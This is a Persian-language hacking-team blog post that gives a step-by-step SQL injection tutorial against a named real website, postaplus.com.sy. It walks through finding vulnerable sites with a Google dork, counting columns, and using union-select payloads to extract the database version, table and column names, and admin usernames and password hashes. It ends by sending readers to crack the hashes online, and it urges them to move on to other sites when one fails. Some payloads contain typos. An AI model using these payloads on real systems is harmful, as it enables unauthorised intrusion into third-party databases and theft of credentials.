توضیح تصویر
  • 98XXXXXXXXXX+
  • mynymhmd2@gmail.com
  • TEHRAN-IRAN
  • 98914XXXXXXX+
تیم دکترسکیوریتی

Dr.Security Team

Android - Windows - Linux

توضیح تصویر

هک سایت با باگsql محمد حسین معینی

این آموزش متنی است اما فیلم آموزشی آن قرار داده میشود

sqlنکته:برای هک سایت باگ های مختلفی است اما ما با باگ اموزش میدم
نکته:برای فهمیدن این که سایت باگ (اس کیو ال) دارد یا نه
اخر اسم ان باید این باشد
faq.php?id=XX
به جای
xx
یک عدد
است
مثال:
http://www.postaplus.com.sy/faq.php?id=2"2"
برای اینکه مطما بشیم باید در اخر ان ( ' ) حرف را بگزاریم و اینتر بزنیم
حالا اگر ارور داد و در بین ارور ان این حرف
Sql
بود قابل هک اما اگه نبود ول کن بریم سایت بعدی
برای اینکه سایت هایی پیدا کنیم که
faq.php?id=XX
داشته باشد در گوگل سرچ کنید
inurl:"php?id="
حالا بیشتر سایت هایی که میاد تقریبا قابل هک است
خوب بریم ادامه کار تا اینجا فرض میکنیم در ارور حرف
SQl
بود
2________________________________
حالا در اخر اسم سایت میزنیم
+order+by+X--
به جای "ایکس" اعدادی میگزاریم تا اخرین عدد را پیدا کنیم مثلا عدد5 سایت سالمه
6سالمه 7سالمه 8سالمه 9ارور میده پس باید انقدر عدد بدیم تا بفهمیم اخرین ستون کدام است
مثال
http://www.postaplus.com.sy/faq.php?id=2+order+by+8--
3____________________________________________
خوب حالا میخواهیم بفهمیم کدام ستون نفوظ پزیر است میزنیم
+union+select+1,2,3,4,5,6,7,8,9,10--
از 1 شروع میکنیم تا به اخرین عددی که در مرحله 2 پیدا کردیم
مثال
http://www.postaplus.com.sy/faq.php?id=2+union+select+1,2,3,4,5,6,7,8,9,10--
در بالا ارور میدهد چرا؟
باید در قبل از 2
faq.php?id=2
یک (-)بزایم مثال
http://www.postaplus.com.sy/faq.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10--
حالا در همان سایت یک جواب میدهد که در این جواب یک عدد است
که این عدد همان سوتون قابل نفوظ است
4__________________________________________________
برای پیدا کردن ورژن دیتل بیس میزنیم
+union+select+1,2,3,version(),5,6,7,8,9,10--
نکته:در بالا من حرف ورژن را به جای 4 قرار دادم شما به جای سوتون باز قرار دهید
(همان عدد که در قسمت 3 بدست اوردیم گفتیم قابل نفوظ است)
حالا جوابی میاید به که ورژن را نوشته مثال
http://www.postaplus.com.sy/faq.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10--
5____________________________________
بدست اوردن دیتا بیس
+union+select+1,2,3,database(),5,6,7,8,9,10--
نکته:در بالا من حرف دیتا بیس را به جای 4 قرار دادم شما به جای سوتون باز قرار دهید
(همان عدد که در قسمت 3 بدست اوردیم گفتیم قابل نفوظ است)
حالا جوابی میاید که دیتابیس را نوشته
مثال
http://www.postaplus.com.sy/faq.php?id=-2+union+select+1,2,3,database(),5,6,7,8,9,10--
6___________________________________________
گرفتن تیبل ادمین
این مد را به اخر سایت اضافه میکنیم تا نام :تیبل ها" را بدست اوریم
+union+select+1,group_concat(table_name),3,4+from+information_schema.tables--
حالا نام تیبل ها به ردیف میاد ما باید بنبال این تیبل ها بگردیم
(admins,admin,user,users)یا نام هایی شبیه این
اگر اینجور نام هارا نجستید دیگه سایت به درد نمیخوره باید برین یک سایت دیگه
فرص کنیم حرف
userبود
name tabel admin sait = "user"
7__________________________________________
بدست اوردن "کولدومن"های ادمین
این کد را اخر سایت اضافه میکنیم
union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=XXX--
XXXبه جای
نام "تیبل"که در مرحله 6 بدست اوردید وارد کنید
مثال
union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=user--
حالا نام تیبل های ادمین میاد
8_________________________________________________
بدست اوردن یوزر
+union+select+1,C,3,4_from+T--
T=Name table ke be dast avadid
C=name column ke be dast ovordid bedid
((کولدوم های زیادی بدست میاد برای بدست اوردن یوزر ان مولدووم های که نامشون شبیه یوزر است وارد کنید))
9__________________________________________________
بدست اوردن پسوورد
+union+select+1,C,3,4_from+T--
T=Name table ke be dast avadid
C=name column ke be dast ovordid bedid
((کولدوم های زیادی بدست میاد برای بدست اوردن یوزر ان کولدووم های که نامشون شبیه پسوورد هست را بدهید است وارد کنید))
10_______________________________________
پسوردی که بدست میاد بشکل هاش کد میاد
برای اینک کد به صورت صبیعی شود وارد سایت
md5decrypter.co.uk
شوید
و هاش کد بدست امده را وارد کنید

 
سفارش محصول
ابتدا یکبار کدامنیتی را تعویض سپس وارد کنید
 
 
تنها امکان ارسال نظر خصوصی وجود دارد
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی
نظر شما به هیچ وجه امکان عمومی شدن در قسمت نظرات را ندارد، و تنها راه پاسخگویی به آن نیز از طریق پست الکترونیک می‌باشد. بنابراین در صورتیکه مایل به دریافت پاسخ هستید، پست الکترونیک خود را وارد کنید.